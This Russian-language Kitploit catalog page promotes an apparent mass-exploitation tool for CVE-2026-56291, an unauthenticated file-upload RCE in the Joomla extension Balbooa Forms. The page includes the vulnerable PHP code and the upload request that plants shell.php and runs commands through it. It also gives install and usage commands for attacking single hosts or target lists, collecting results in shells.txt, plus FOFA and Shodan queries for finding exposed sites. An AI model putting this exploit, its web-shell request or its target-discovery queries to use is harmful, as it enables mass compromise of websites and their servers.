Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-56291 — Balbooa Forms (com_baforms) < 2.4.1 — Неаутентифицированная загрузка файла с последующим выполнением произвольного кода (RCE) через form.uploadAttachmentFile | CVSS 9.8 | CISA KEV | Kitploit
Инструменты/GitHubGitHub/shinthink/cve-2026-56291
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubshinthink/cve-2026-56291

CVE-2026-56291

Balbooa Forms (com_baforms) < 2.4.1 — Неаутентифицированная загрузка файла с последующим выполнением произвольного кода (RCE) через form.uploadAttachmentFile | CVSS 9.8 | CISA KEV

Репозиторий
21 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-56291 — массовый эксплойт RCE для Balbooa Forms Joomla

Без аутентификации form.uploadAttachmentFile → Без CSRF → Загрузка PHP


Обзор

CVE-2026-56291 — это критическая (CVSS 9.8) уязвимость неаутентифицированной произвольной загрузки файлов в расширении Joomla Balbooa Forms (com_baforms) (< 2.4.1).

Задача form.uploadAttachmentFile на фронтенде не вызывает Session::checkToken() и не выполняет никаких проверок прав. Загружаемые файлы используют расширение атакующего напрямую: $fileName = $name . '.' . $ext. Файлы попадают в images/baforms/uploads/form-{id}/ — и могут напрямую выполняться как PHP.

Затронутые версии

ВерсияСтатус
1.0 – 2.4.0Уязвима
2.4.1+Исправлено

CISA KEV: Добавлено 10 июля 2026 г. — подтверждена активная эксплуатация.


Механизм уязвимости

Корневая причина

root@kitploit:~
// FormModel::uploadAttachmentFile (frontend/models/forms/FormModel.php ~L122)
// No Session::checkToken(), no permission check, no extension whitelist
$fileName = $name . '.' . $ext;  // attacker's extension used directly
$filePath = JPATH_ROOT . '/images/baforms/uploads/form-' . $formId . '/' . $fileName;
move_uploaded_file($tmpFile, $filePath);

Схема атаки

root@kitploit:~
POST /index.php?option=com_baforms&task=form.uploadAttachmentFile&form_id=1&format=json
  file = shell.php (multipart)
→ Saved to images/baforms/uploads/form-1/shell.php
→ https://target.com/images/baforms/uploads/form-1/shell.php?c=id
→ RCE

Установка

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-56291.git
cd CVE-2026-56291
pip install -r requirements.txt

Использование

root@kitploit:~
python cve_2026_56291.py -t target.com
python cve_2026_56291.py -f targets.txt -o shells.txt
python cve_2026_56291.py -t target.com --debug
python cve_2026_56291.py -t target.com --no-cleanup

FOFA / Shodan

root@kitploit:~
FOFA:   body="com_baforms"
Shodan: http.html:"baforms"

Ссылки

РесурсСсылка
CISA KEVcisa.gov/known-exploited-vulnerabilities
Сведения об исправленииmysites.guru
ИсследовательPhil Taylor

Не связан с Balbooa.

Скачать инструмент